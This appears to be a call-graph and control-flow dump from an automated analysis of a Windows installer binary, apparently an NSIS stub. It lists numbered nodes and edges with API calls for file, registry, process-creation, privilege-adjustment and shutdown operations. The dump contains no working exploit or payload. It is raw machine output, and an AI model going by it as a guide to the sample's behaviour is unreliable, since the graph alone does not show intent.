10001074 5197->5199 5198 100010dd 5199->5198 5200 10001516 GlobalFree 5199->5200 5201 10001092 5199->5201 5200->5201 5202 10001516 GlobalFree 5201->5202 5203 100010a2 5202->5203 5204 100010b2 5203->5204 5205 100010a9 GlobalSize 5203->5205 5206 100010b6 GlobalAlloc 5204->5206 5207 100010c7 5204->5207 5205->5204 5208 1000153d 2 API calls 5206->5208 5209 100010d2 GlobalFree 5207->5209 5208->5207 5209->5198 4756 40159b 4757 402bbf 18 API calls 4756->4757 4758 4015a2 SetFileAttributesW 4757->4758 4759 4015b4 4758->4759 4768 40229d 4769 4022a5 4768->4769 4770 4022ab 4768->4770 4772 402bbf 18 API calls 4769->4772 4771 4022b9 4770->4771 4773 402bbf 18 API calls 4770->4773 4774 4022c7 4771->4774 4775 402bbf 18 API calls 4771->4775 4772->4770 4773->4771 4776 402bbf 18 API calls 4774->4776 4775->4774 4777 4022d0 WritePrivateProfileStringW 4776->4777 5210 401f1d 5211 402bbf 18 API calls 5210->5211 5212 401f24 5211->5212 5213 40642b 5 API calls 5212->5213 5214 401f33 5213->5214 5215 401fb7 5214->5215 5216 401f4f GlobalAlloc 5214->5216 5216->5215 5217 401f63 5216->5217 5218 40642b 5 API calls 5217->5218 5219 401f6a 5218->5219 5220 40642b 5 API calls 5219->5220 5221 401f74 5220->5221 5221->5215 5225 405f9c wsprintfW 5221->5225 5223 401fa9 5226 405f9c wsprintfW 5223->5226 5225->5223 5226->5215 5227 40149e 5228 402288 5227->5228 5229 4014ac PostQuitMessage 5227->5229 5229->5228 5230 40249e 5231 402cc9 19 API calls 5230->5231 5232 4024a8 5231->5232 5233 402ba2 18 API calls 5232->5233 5234 4024b1 5233->5234 5235 4024d5 RegEnumValueW 5234->5235 5236 4024c9 RegEnumKeyW 5234->5236 5238 40281e 5234->5238 5237 4024ee RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 40231f 5241 402324 5240->5241 5242 40234f 5240->5242 5243 402cc9 19 API calls 5241->5243 5244 402bbf 18 API calls 5242->5244 5245 40232b 5243->5245 5246 402356 5244->5246 5247 402bbf 18 API calls 5245->5247 5250 40236c 5245->5250 5251 402bff RegOpenKeyExW 5246->5251 5248 40233c RegDeleteValueW RegCloseKey 5247->5248 5248->5250 5252 402c2a 5251->5252 5259 402c76 5251->5259 5253 402c50 RegEnumKeyW 5252->5253 5254 402c62 RegCloseKey 5252->5254 5255 402c87 RegCloseKey 5252->5255 5257 402bff 5 API calls 5252->5257 5253->5252 5253->5254 5256 40642b 5 API calls 5254->5256 5255->5259 5258 402c72 5256->5258 5257->5252 5258->5259 5260 402ca2 RegDeleteKeyW 5258->5260 5259->5250 5260->5259 3717 4032a0 SetErrorMode GetVersion 3718 4032d4 3717->3718 3719 4032da 3717->3719 3720 40642b 5 API calls 3718->3720 3808 4063bf GetSystemDirectoryW 3719->3808 3720->3719 3722 4032f1 3723 4063bf 3 API calls 3722->3723 3724 4032fb 3723->3724 3725 4063bf 3 API calls 3724->3725 3726 403305 3725->3726 3811 40642b GetModuleHandleA 3726->3811 3729 40642b 5 API calls 3730 403313 #17 OleInitialize SHGetFileInfoW 3729->3730 3817 406055 lstrcpynW 3730->3817 3732 403350 GetCommandLineW 3818 406055 lstrcpynW 3732->3818 3734 403362 GetModuleHandleW 3735 40337a 3734->3735 3819 405a36 3735->3819 3738 4034b4 GetTempPathW 3823 40326f 3738->3823 3740 4034cc 3741 4034d0 GetWindowsDirectoryW lstrcatW 3740->3741 3742 403526 DeleteFileW 3740->3742 3744 40326f 12 API calls 3741->3744 3833 402dee GetTickCount GetModuleFileNameW 3742->3833 3743 4033a2 3745 405a36 CharNextW 3743->3745 3751 40349f 3743->3751 3753 40349d 3743->3753 3747 4034ec 3744->3747 3745->3743 3747->3742 3749 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3749 3748 40353a 3754 405a36 CharNextW 3748->3754 3790 4035dd 3748->3790 3803 4035ed 3748->3803 3752 40326f 12 API calls 3749->3752 3917 406055 lstrcpynW 3751->3917 3758 40351e 3752->3758 3753->3738 3770 403559 3754->3770 3758->3742 3758->3803 3759 403728 3762 403730 GetCurrentProcess OpenProcessToken 3759->3762 3763 4037ac ExitProcess 3759->3763 3760 403608 3941 40579a 3760->3941 3768 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3762->3768 3769 40377c 3762->3769 3765 4035b7 3918 405b11 3765->3918 3766 40361e 3945 40571d 3766->3945 3768->3769 3773 40642b 5 API calls 3769->3773 3770->3765 3770->3766 3784 403783 3773->3784 3776 403798 ExitWindowsEx 3776->3763 3779 4037a5 3776->3779 3777 403634 lstrcatW 3778 40363f lstrcatW lstrcmpiW 3777->3778 3781 40365b 3778->3781 3778->3803 3983 40140b 3779->3983 3782 403660 3781->3782 3783 403667 3781->3783 3948 405683 CreateDirectoryW 3782->3948 3953 405700 CreateDirectoryW 3783->3953 3784->3776 3784->3779 3786 4035d2 3933 406055 lstrcpynW 3786->3933 3861 40389e 3790->3861 3792 40366c SetCurrentDirectoryW 3793 403687 3792->3793 3794 40367c 3792->3794 3957 406055 lstrcpynW 3793->3957 3956 406055 lstrcpynW 3794->3956 3799 4036d3 CopyFileW 3805 403695 3799->3805 3800 40371c 3802 405ef6 38 API calls 3800->3802 3802->3803 3934 4037c4 3803->3934 3804 406077 18 API calls 3804->3805 3805->3800 3805->3804 3807 403707 CloseHandle 3805->3807 3958 406077 3805->3958 3976 405ef6 MoveFileExW 3805->3976 3980 405735 CreateProcessW 3805->3980 3807->3805 3809 4063e1 wsprintfW LoadLibraryW 3808->3809 3809->3722 3812 406451 GetProcAddress 3811->3812 3813 406447 3811->3813 3815 40330c 3812->3815 3814 4063bf 3 API calls 3813->3814 3816 40644d 3814->3816 3815->3729 3816->3812 3816->3815 3817->3732 3818->3734 3820 405a3c 3819->3820 3821 403389 CharNextW 3820->3821 3822 405a43 CharNextW 3820->3822 3821->3738 3821->3743 3822->3820 3986 4062e9 3823->3986 3825 403285 3825->3740 3826 40327b 3826->3825 3995 405a09 lstrlenW CharPrevW 3826->3995 3829 405700 2 API calls 3830 403293 3829->3830 3998 405c59 3830->3998 4002 405c2a GetFileAttributesW CreateFileW 3833->4002 3835 402e2e 3854 402e3e 3835->3854 4003 406055 lstrcpynW 3835->4003 3837 402e54 4004 405a55 lstrlenW 3837->4004 3841 402e65 GetFileSize 3842 402f61 3841->3842 3860 402e7c 3841->3860 4009 402d8a 3842->4009 3844 402f6a 3846 402f9a GlobalAlloc 3844->3846 3844->3854 4044 403258 SetFilePointer 3844->4044 4020 403258 SetFilePointer 3846->4020 3847 402fcd 3851 402d8a 6 API calls 3847->3851 3850 402fb5 4021 403027 3850->4021 3851->3854 3852 402f83 3855 403242 ReadFile 3852->3855 3854->3748 3857 402f8e 3855->3857 3856 402d8a 6 API calls 3856->3860 3857->3846 3857->3854 3858 402fc1 3858->3854 3858->3858 3859 402ffe SetFilePointer 3858->3859 3859->3854 3860->3842 3860->3847 3860->3854 3860->3856 4041 403242 3860->4041 3862 40642b 5 API calls 3861->3862 3863 4038b2 3862->3863 3864 4038b8 GetUserDefaultUILanguage 3863->3864 3865 4038ca 3863->3865 4065 405f9c wsprintfW 3864->4065 4075 405f22 RegOpenKeyExW 3865->4075 3868 4038c8 4066 403b74 3868->4066 3870 403919 lstrcatW 3870->3868 3871 405f22 3 API calls 3871->3870 3874 405b11 18 API calls 3875 40394b 3874->3875 3876 4039df 3875->3876 3879 405f22 3 API calls 3875->3879 3877 405b11 18 API calls 3876->3877 3878 4039e5 3877->3878 3881 4039f5 LoadImageW 3878->3881 3882 406077 18 API calls 3878->3882 3880 40397d 3879->3880 3880->3876 3885 40399e lstrlenW 3880->3885 3889 405a36 CharNextW 3880->3889 3883 403a9b 3881->3883 3884 403a1c RegisterClassW 3881->3884 3882->3881 3888 40140b 2 API calls 3883->3888 3886 403a52 SystemParametersInfoW CreateWindowExW 3884->3886 3887 403aa5 3884->3887 3890 4039d2 3885->3890 3891 4039ac lstrcmpiW 3885->3891 3886->3883 3887->3803 3892 403aa1 3888->3892 3893 40399b 3889->3893 3895 405a09 3 API calls 3890->3895 3891->3890 3894 4039bc GetFileAttributesW 3891->3894 3892->3887 3897 403b74 19 API calls 3892->3897 3893->3885 3896 4039c8 3894->3896 3898 4039d8 3895->3898 3896->3890 3899 405a55 2 API calls 3896->3899 3900 403ab2 3897->3900 4080 406055 lstrcpynW 3898->4080 3899->3890 3902 403b41 3900->3902 3903 403abe ShowWindow 3900->3903 4081 405287 OleInitialize 3902->4081 3905 4063bf 3 API calls 3903->3905 3906 403ad6 3905->3906 3908 403ae4 GetClassInfoW 3906->3908 3910 4063bf 3 API calls 3906->3910 3907 403b47 3909 403b63 3907->3909 3914 403b4b 3907->3914 3912 403af8 GetClassInfoW RegisterClassW 3908->3912 3913 403b0e DialogBoxParamW 3908->3913 3911 40140b 2 API calls 3909->3911 3910->3908 3911->3887 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3887 3916 40140b 2 API calls 3914->3916 3915->3887 3916->3887 3917->3753 4096 406055 lstrcpynW 3918->4096 3920 405b22 4097 405ab4 CharNextW CharNextW 3920->4097 3923 4035c3 3923->3803 3932 406055 lstrcpynW 3923->3932 3924 4062e9 5 API calls 3925 405b38 3924->3925 3925->3923 3926 405b69 lstrlenW 3925->3926 3931 405a55 2 API calls 3925->3931 4103 406398 FindFirstFileW 3925->4103 3926->3925 3927 405b74 3926->3927 3928 405a09 3 API calls 3927->3928 3930 405b79 GetFileAttributesW 3928->3930 3930->3923 3931->3926 3932->3786 3933->3790 3935 4037dc 3934->3935 3936 4037ce CloseHandle 3934->3936 4106 403809 3935->4106 3936->3935 3942 4057af 3941->3942 3943 403616 ExitProcess 3942->3943 3944 4057c3 MessageBoxIndirectW 3942->3944 3944->3943 3946 40642b 5 API calls 3945->3946 3947 403623 lstrcatW 3946->3947 3947->3777 3947->3778 3949 403665 3948->3949 3950 4056d4 GetLastError 3948->3950 3949->3792 3950->3949 3951 4056e3 SetFileSecurityW 3950->3951 3951->3949 3952 4056f9 GetLastError 3951->3952 3952->3949 3954 405710 3953->3954 3955 405714 GetLastError 3953->3955 3954->3792 3955->3954 3956->3793 3957->3805 3967 406084 3958->3967 3959 4062cf 3960 4036c6 DeleteFileW 3959->3960 4165 406055 lstrcpynW 3959->4165 3960->3799 3960->3805 3962 406137 GetVersion 3962->3967 3963 40629d lstrlenW 3963->3967 3966 406077 10 API calls 3966->3963 3967->3959 3967->3962 3967->3963 3967->3966 3968 405f22 3 API calls 3967->3968 3969 4061b2 GetSystemDirectoryW 3967->3969 3970 4061c5 GetWindowsDirectoryW 3967->3970 3971 4062e9 5 API calls 3967->3971 3972 4061f9 SHGetSpecialFolderLocation 3967->3972 3973 406077 10 API calls 3967->3973 3974 40623e lstrcatW 3967->3974 4163 405f9c wsprintfW 3967->4163 4164 406055 lstrcpynW 3967->4164 3968->3967 3969->3967 3970->3967 3971->3967 3972->3967 3975 406211 SHGetPathFromIDListW CoTaskMemFree 3972->3975 3973->3967 3974->3967 3975->3967 3977 405f17 3976->3977 3978 405f0a 3976->3978 3977->3805 4166 405d84 lstrcpyW 3978->4166 3981 405774 3980->3981 3982 405768 CloseHandle 3980->3982 3981->3805 3982->3981 3984 401389 2 API calls 3983->3984 3985 401420 3984->3985 3985->3763 3992 4062f6 3986->3992 3987 40636c 3988 406371 CharPrevW 3987->3988 3990 406392 3987->3990 3988->3987 3989 40635f CharNextW 3989->3987 3989->3992 3990->3826 3991 405a36 CharNextW 3991->3992 3992->3987 3992->3989 3992->3991 3993 40634b CharNextW 3992->3993 3994 40635a CharNextW 3992->3994 3993->3992 3994->3989 3996 40328d 3995->3996 3997 405a25 lstrcatW 3995->3997 3996->3829 3997->3996 3999 405c66 GetTickCount GetTempFileNameW 3998->3999 4000 40329e 3999->4000 4001 405c9c 3999->4001 4000->3740 4001->3999 4001->4000 4002->3835 4003->3837 4005 405a63 4004->4005 4006 402e5a 4005->4006 4007 405a69 CharPrevW 4005->4007 4008 406055 lstrcpynW 4006->4008 4007->4005 4007->4006 4008->3841 4010 402d93 4009->4010 4011 402dab 4009->4011 4012 402da3 4010->4012 4013 402d9c DestroyWindow 4010->4013 4014 402db3 4011->4014 4015 402dbb GetTickCount 4011->4015 4012->3844 4013->4012 4045 406467 4014->4045 4017 402dc9 CreateDialogParamW ShowWindow 4015->4017 4018 402dec 4015->4018 4017->4018 4018->3844 4020->3850 4022 403040 4021->4022 4023 40306e 4022->4023 4051 403258 SetFilePointer 4022->4051 4025 403242 ReadFile 4023->4025 4026 403079 4025->4026 4027 4031db 4026->4027 4028 40308b GetTickCount 4026->4028 4036 4031c5 4026->4036 4029 40321d 4027->4029 4034 4031df 4027->4034 4028->4036 4040 4030da 4028->4040 4030 403242 ReadFile 4029->4030 4030->4036 4031 403242 ReadFile 4031->4040 4032 403242 ReadFile 4032->4034 4033 405cdc WriteFile 4033->4034 4034->4032 4034->4033 4034->4036 4035 403130 GetTickCount 4035->4040 4036->3858 4037 403155 MulDiv wsprintfW 4052 4051b4 4037->4052 4040->4031 4040->4035 4040->4036 4040->4037 4049 405cdc WriteFile 4040->4049 4063 405cad ReadFile 4041->4063 4044->3852 4046 406484 PeekMessageW 4045->4046 4047 402db9 4046->4047 4048 40647a DispatchMessageW 4046->4048 4047->3844 4048->4046 4050 405cfa 4049->4050 4050->4040 4051->4023 4053 405271 4052->4053 4054 4051cf 4052->4054 4053->4040 4055 4051eb lstrlenW 4054->4055 4056 406077 18 API calls 4054->4056 4057 405214 4055->4057 4058 4051f9 lstrlenW 4055->4058 4056->4055 4060 405227 4057->4060 4061 40521a SetWindowTextW 4057->4061 4058->4053 4059 40520b lstrcatW 4058->4059 4059->4057 4060->4053 4062 40522d SendMessageW SendMessageW SendMessageW 4060->4062 4061->4060 4062->4053 4064 403255 4063->4064 4064->3860 4065->3868 4067 403b88 4066->4067 4088 405f9c wsprintfW 4067->4088 4069 403bf9 4070 406077 18 API calls 4069->4070 4071 403c05 SetWindowTextW 4070->4071 4072 403c21 4071->4072 4073 403929 4071->4073 4072->4073 4074 406077 18 API calls 4072->4074 4073->3874 4074->4072 4076 4038fa 4075->4076 4077 405f56 RegQueryValueExW 4075->4077 4076->3870 4076->3871 4079 405f77 RegCloseKey 4077->4079 4079->4076 4080->3876 4089 404165 4081->4089 4083 4052aa 4087 4052d1 4083->4087 4092 401389 4083->4092 4084 404165 SendMessageW 4085 4052e3 OleUninitialize 4084->4085 4085->3907 4087->4084 4088->4069 4090 40417d 4089->4090 4091 40416e SendMessageW 4089->4091 4090->4083 4091->4090 4094 401390 4092->4094 4093 4013fe 4093->4083 4094->4093 4095 4013cb MulDiv SendMessageW 4094->4095 4095->4094 4096->3920 4098 405ad1 4097->4098 4099 405ae3 4097->4099 4098->4099 4100 405ade CharNextW 4098->4100 4101 405a36 CharNextW 4099->4101 4102 405b07 4099->4102 4100->4102 4101->4099 4102->3923 4102->3924 4104 4063b9 4103->4104 4105 4063ae FindClose 4103->4105 4104->3925 4105->4104 4107 403817 4106->4107 4108 4037e1 4107->4108 4109 40381c FreeLibrary GlobalFree 4107->4109 4110 405846 4108->4110 4109->4108 4109->4109 4111 405b11 18 API calls 4110->4111 4112 405866 4111->4112 4113 405885 4112->4113 4114 40586e DeleteFileW 4112->4114 4116 4059b0 4113->4116 4150 406055 lstrcpynW 4113->4150 4115 4035f6 OleUninitialize 4114->4115 4115->3759 4115->3760 4116->4115 4121 406398 2 API calls 4116->4121 4118 4058ab 4119 4058b1 lstrcatW 4118->4119 4120 4058be 4118->4120 4122 4058c4 4119->4122 4123 405a55 2 API calls 4120->4123 4126 4059ca 4121->4126 4124 4058d4 lstrcatW 4122->4124 4125 4058ca 4122->4125 4123->4122 4127 4058df lstrlenW FindFirstFileW 4124->4127 4125->4124 4125->4127 4126->4115 4128 4059ce 4126->4128 4129 405901 4127->4129 4130 4059a5 4127->4130 4131 405a09 3 API calls 4128->4131 4133 405988 FindNextFileW 4129->4133 4143 405846 62 API calls 4129->4143 4145 4051b4 25 API calls 4129->4145 4147 4051b4 25 API calls 4129->4147 4149 405ef6 38 API calls 4129->4149 4151 406055 lstrcpynW 4129->4151 4152 4057fe 4129->4152 4130->4116 4132 4059d4 4131->4132 4134 4057fe 5 API calls 4132->4134 4133->4129 4137 40599e FindClose 4133->4137 4136 4059e0 4134->4136 4138 4059e4 4136->4138 4139 4059fa 4136->4139 4137->4130 4138->4115 4142 4051b4 25 API calls 4138->4142 4140 4051b4 25 API calls 4139->4140 4140->4115 4144 4059f1 4142->4144 4143->4129 4146 405ef6 38 API calls 4144->4146 4145->4133 4148 4059f8 4146->4148 4147->4129 4148->4115 4149->4129 4150->4118 4151->4129 4160 405c05 GetFileAttributesW 4152->4160 4155 40582b 4155->4129 4156 405821 DeleteFileW 4158 405827 4156->4158 4157 405819 RemoveDirectoryW 4157->4158 4158->4155 4159 405837 SetFileAttributesW 4158->4159 4159->4155 4161 40580a 4160->4161 4162 405c17 SetFileAttributesW 4160->4162 4161->4155 4161->4156 4161->4157 4162->4161 4163->3967 4164->3967 4165->3960 4167 405dd2 GetShortPathNameW 4166->4167 4168 405dac 4166->4168 4170 405ef1 4167->4170 4171 405de7 4167->4171 4193 405c2a GetFileAttributesW CreateFileW 4168->4193 4170->3977 4171->4170 4173 405def wsprintfA 4171->4173 4172 405db6 CloseHandle GetShortPathNameW 4172->4170 4174 405dca 4172->4174 4175 406077 18 API calls 4173->4175 4174->4167 4174->4170 4176 405e17 4175->4176 4194 405c2a GetFileAttributesW CreateFileW 4176->4194 4178 405e24 4178->4170 4179 405e33 GetFileSize GlobalAlloc 4178->4179 4180 405e55 4179->4180 4181 405eea CloseHandle 4179->4181 4182 405cad ReadFile 4180->4182 4181->4170 4183 405e5d 4182->4183 4183->4181 4195 405b8f lstrlenA 4183->4195 4186 405e74 lstrcpyA 4189 405e96 4186->4189 4187 405e88 4188 405b8f 4 API calls 4187->4188 4188->4189 4190 405ecd SetFilePointer 4189->4190 4191 405cdc WriteFile 4190->4191 4192 405ee3 GlobalFree 4191->4192 4192->4181 4193->4172 4194->4178 4196 405bd0 lstrlenA 4195->4196 4197 405ba9 lstrcmpiA 4196->4197 4198 405bd8 4196->4198 4197->4198 4199 405bc7 CharNextA 4197->4199 4198->4186 4198->4187 4199->4196 5261 100010e1 5264 10001111 5261->5264 5262 100011d8 GlobalFree 5263 100012ba 2 API calls 5263->5264 5264->5262 5264->5263 5265 100011d3 5264->5265 5266 10001272 2 API calls 5264->5266 5267 10001164 GlobalAlloc 5264->5267 5268 100011f8 GlobalFree 5264->5268 5269 100011c4 GlobalFree 5264->5269 5270 100012e1 lstrcpyW 5264->5270 5265->5262 5266->5269 5267->5264 5268->5264 5269->5264 5270->5264 5271 401ca3 5272 402ba2 18 API calls 5271->5272 5273 401ca9 IsWindow 5272->5273 5274 401a05 5273->5274 5275 402a27 SendMessageW 5276 402a41 InvalidateRect 5275->5276 5277 402a4c 5275->5277 5276->5277 4565 405128 4566 405138 4565->4566 4567 40514c 4565->4567 4569 405195 4566->4569 4570 40513e 4566->4570 4568 405154 IsWindowVisible 4567->4568 4577 405174 4567->4577 4568->4569 4572 405161 4568->4572 4573 40519a CallWindowProcW 4569->4573 4571 404165 SendMessageW 4570->4571 4574 405148 4571->4574 4579 404a7e SendMessageW 4572->4579 4573->4574 4577->4573 4584 404afe 4577->4584 4580 404aa1 GetMessagePos ScreenToClient SendMessageW 4579->4580 4581 404add SendMessageW 4579->4581 4582 404ad5 4580->4582 4583 404ada 4580->4583 4581->4582 4582->4577 4583->4581 4593 406055 lstrcpynW 4584->4593 4586 404b11 4594 405f9c wsprintfW 4586->4594 4588 404b1b 4589 40140b 2 API calls 4588->4589 4590 404b24 4589->4590 4595 406055 lstrcpynW 4590->4595 4592 404b2b 4592->4569 4593->4586 4594->4588 4595->4592 4596 40242a 4607 402cc9 4596->4607 4598 402434 4599 402bbf 18 API calls 4598->4599 4600 40243d 4599->4600 4601 402448 RegQueryValueExW 4600->4601 4602 40281e 4600->4602 4603 402468 4601->4603 4606 40246e RegCloseKey 4601->4606 4603->4606 4611 405f9c wsprintfW 4603->4611 4606->4602 4608 402bbf 18 API calls 4607->4608 4609 402ce2 4608->4609 4610 402cf0 RegOpenKeyExW 4609->4610 4610->4598 4611->4606 5278 40422d lstrcpynW lstrlenW 5279 40172d 5280 402bbf 18 API calls 5279->5280 5281 401734 SearchPathW 5280->5281 5282 40174f 5281->5282 4612 404b30 GetDlgItem GetDlgItem 4613 404b82 7 API calls 4612->4613 4616 404d9b 4612->4616 4614 404c25 DeleteObject 4613->4614 4615 404c18 SendMessageW 4613->4615 4617 404c2e 4614->4617 4615->4614 4623 404e60 4616->4623 4626 404e7f 4616->4626 4630 404dfb 4616->4630 4618 404c65 4617->4618 4619 404c3d 4617->4619 4620 404119 19 API calls 4618->4620 4622 406077 18 API calls 4619->4622 4624 404c79 4620->4624 4621 404f2b 4627 404f35 SendMessageW 4621->4627 4628 404f3d 4621->4628 4629 404c47 SendMessageW SendMessageW 4622->4629 4623->4626 4635 404e71 SendMessageW 4623->4635 4632 404119 19 API calls 4624->4632 4625 405113 4634 404180 8 API calls 4625->4634 4626->4621 4626->4625 4633 404ed8 SendMessageW 4626->4633 4627->4628 4636 404f56 4628->4636 4637 404f4f ImageList_Destroy 4628->4637 4644 404f66 4628->4644 4629->4617 4631 404a7e 5 API calls 4630->4631 4649 404e0c 4631->4649 4650 404c87 4632->4650 4633->4625 4639 404eed SendMessageW 4633->4639 4640 405121 4634->4640 4635->4626 4641 404f5f GlobalFree 4636->4641 4636->4644 4637->4636 4638 4050d5 4638->4625 4645 4050e7 ShowWindow GetDlgItem ShowWindow 4638->4645 4643 404f00 4639->4643 4641->4644 4642 404d5c GetWindowLongW SetWindowLongW 4646 404d75 4642->4646 4654 404f11 SendMessageW 4643->4654 4644->4638 4659 404afe 4 API calls 4644->4659 4662 404fa1 4644->4662 4645->4625 4647 404d93 4646->4647 4648 404d7b ShowWindow 4646->4648 4669 40414e SendMessageW 4647->4669 4668 40414e SendMessageW 4648->4668 4649->4623 4650->4642 4653 404cd7 SendMessageW 4650->4653 4655 404d56 4650->4655 4657 404d13 SendMessageW 4650->4657 4658 404d24 SendMessageW 4650->4658 4653->4650 4654->4621 4655->4642 4655->4646 4656 404d8e 4656->4625 4657->4650 4658->4650 4659->4662 4660 4050ab InvalidateRect 4660->4638 4661 4050c1 4660->4661 4670 404a39 4661->4670 4663 404fcf SendMessageW 4662->4663 4664 404fe5 4662->4664 4663->4664 4664->4660 4665 405046 4664->4665 4667 405059 SendMessageW SendMessageW 4664->4667 4665->4667 4667->4664 4668->4656 4669->4616 4673 404970 4670->4673 4672 404a4e 4672->4638 4674 404989 4673->4674 4675 406077 18 API calls 4674->4675 4676 4049ed 4675->4676 4677 406077 18 API calls 4676->4677 4678 4049f8 4677->4678 4679 406077 18 API calls 4678->4679 4680 404a0e lstrlenW wsprintfW SetDlgItemTextW 4679->4680 4680->4672 5283 4045b4 5284 4045e0 5283->5284 5285 4045f1 5283->5285 5344 40577e GetDlgItemTextW 5284->5344 5286 4045fd GetDlgItem 5285->5286 5289 40465c 5285->5289 5288 404611 5286->5288 5293 404625 SetWindowTextW 5288->5293 5296 405ab4 4 API calls 5288->5296 5290 404740 5289->5290 5298 406077 18 API calls 5289->5298 5342 4048ef 5289->5342 5290->5342 5346 40577e GetDlgItemTextW 5290->5346 5291 4045eb 5292 4062e9 5 API calls 5291->5292 5292->5285 5297 404119 19 API calls 5293->5297 5295 404180 8 API calls 5300 404903 5295->5300 5301 40461b 5296->5301 5302 404641 5297->5302 5303 4046d0 SHBrowseForFolderW 5298->5303 5299 404770 5304 405b11 18 API calls 5299->5304 5301->5293 5308 405a09 3 API calls 5301->5308 5305 404119 19 API calls 5302->5305 5303->5290 5306 4046e8 CoTaskMemFree 5303->5306 5307 404776 5304->5307 5309 40464f 5305->5309 5310 405a09 3 API calls 5306->5310 5347 406055 lstrcpynW 5307->5347 5308->5293 5345 40414e SendMessageW 5309->5345 5317 4046f5 5310->5317 5313 404655 5316 40642b 5 API calls 5313->5316 5314 40472c SetDlgItemTextW 5314->5290 5315 40478d 5318 40642b 5 API calls 5315->5318 5316->5289 5317->5314 5319 406077 18 API calls 5317->5319 5326 404794 5318->5326 5320 404714 lstrcmpiW 5319->5320 5320->5314 5322 404725 lstrcatW 5320->5322 5321 4047d5 5348 406055 lstrcpynW 5321->5348 5322->5314 5324 4047dc 5325 405ab4 4 API calls 5324->5325 5327 4047e2 GetDiskFreeSpaceW 5325->5327 5326->5321 5330 405a55 2 API calls 5326->5330 5331 40482d 5326->5331 5329 404806 MulDiv 5327->5329 5327->5331 5329->5331 5330->5326 5332 40489e 5331->5332 5333 404a39 21 API calls 5331->5333 5334 4048c1 5332->5334 5336 40140b 2 API calls 5332->5336 5335 40488b 5333->5335 5349 40413b EnableWindow 5334->5349 5337 4048a0 SetDlgItemTextW 5335->5337 5338 404890 5335->5338 5336->5334 5337->5332 5340 404970 21 API calls 5338->5340 5340->5332 5341 4048dd 5341->5342 5350 404549 5341->5350 5342->5295 5344->5291 5345->5313 5346->5299 5347->5315 5348->5324 5349->5341 5351 404557 5350->5351 5352 40455c SendMessageW 5350->5352 5351->5352 5352->5342 5353 4027b4 5354 4027ba 5353->5354 5355 4027c2 FindClose 5354->5355 5356 402a4c 5354->5356 5355->5356 5357 4042b6 5358 4042ce 5357->5358 5362 4043e8 5357->5362 5363 404119 19 API calls 5358->5363 5359 404452 5360 404524 5359->5360 5361 40445c GetDlgItem 5359->5361 5368 404180 8 API calls 5360->5368 5364 4044e5 5361->5364 5365 404476 5361->5365 5362->5359 5362->5360 5366 404423 GetDlgItem SendMessageW 5362->5366 5367 404335 5363->5367 5364->5360 5373 4044f7 5364->5373 5365->5364 5372 40449c 6 API calls 5365->5372 5388 40413b EnableWindow 5366->5388 5370 404119 19 API calls 5367->5370 5371 40451f 5368->5371 5375 404342 CheckDlgButton 5370->5375 5372->5364 5376 40450d 5373->5376 5377 4044fd SendMessageW 5373->5377 5374 40444d 5379 404549 SendMessageW 5374->5379 5386 40413b EnableWindow 5375->5386 5376->5371 5378 404513 SendMessageW 5376->5378 5377->5376 5378->5371 5379->5359 5381 404360 GetDlgItem 5387 40414e SendMessageW 5381->5387 5383 404376 SendMessageW 5384 404393 GetSysColor 5383->5384 5385 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5383->5385 5384->5385 5385->5371 5386->5381 5387->5383 5388->5374 5389 401b37 5390 401b44 5389->5390 5391 401b88 5389->5391 5392 401bcd 5390->5392 5397 401b5b 5390->5397 5393 401bb2 GlobalAlloc 5391->5393 5394 401b8d 5391->5394 5396 406077 18 API calls 5392->5396 5404 402288 5392->5404 5395 406077 18 API calls 5393->5395 5394->5404 5410 406055 lstrcpynW 5394->5410 5395->5392 5398 402282 5396->5398 5408 406055 lstrcpynW 5397->5408 5402 40579a MessageBoxIndirectW 5398->5402 5401 401b9f GlobalFree 5401->5404 5402->5404 5403 401b6a 5409 406055 lstrcpynW 5403->5409 5406 401b79 5411 406055 lstrcpynW 5406->5411 5408->5403 5409->5406 5410->5401 5411->5404 5412 402537 5413 402562 5412->5413 5414 40254b 5412->5414 5416 402596 5413->5416 5417 402567 5413->5417 5415 402ba2 18 API calls 5414->5415 5424 402552 5415->5424 5418 402bbf 18 API calls 5416->5418 5419 402bbf 18 API calls 5417->5419 5420 40259d lstrlenW 5418->5420 5421 40256e WideCharToMultiByte lstrlenA 5419->5421 5420->5424 5421->5424 5422 4025ca 5423 4025e0 5422->5423 5425 405cdc WriteFile 5422->5425 5424->5422 5424->5423 5426 405d0b 5 API calls 5424->5426 5425->5423 5426->5422 5427 4014b8 5428 4014be 5427->5428 5429 401389 2 API calls 5428->5429 5430 4014c6 5429->5430 4709 4015b9 4710 402bbf 18 API calls 4709->4710 4711 4015c0 4710->4711 4712 405ab4 4 API calls 4711->4712 4724 4015c9 4712->4724 4713 401629 4715 40165b 4713->4715 4716 40162e 4713->4716 4714 405a36 CharNextW 4714->4724 4718 401423 25 API calls 4715->4718 4717 401423 25 API calls 4716->4717 4719 401635 4717->4719 4725 401653 4718->4725 4728 406055 lstrcpynW 4719->4728 4721 405700 2 API calls 4721->4724 4722 40571d 5 API calls 4722->4724 4723 401642 SetCurrentDirectoryW 4723->4725 4724->4713 4724->4714 4724->4721 4724->4722 4726 40160f GetFileAttributesW 4724->4726 4727 405683 4 API calls 4724->4727 4726->4724 4727->4724 4728->4723 5431 10002a7f 5432 10002a97 5431->5432 5433 1000158f 2 API calls 5432->5433 5434 10002ab2 5433->5434

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 32 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->32 33 403526-403540 DeleteFileW call 402dee 25->33 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 34 403480-40348d call 405a36 31->34 35 4033c8-4033ce 31->35 32->33 50 4034f0-403520 GetTempPathW 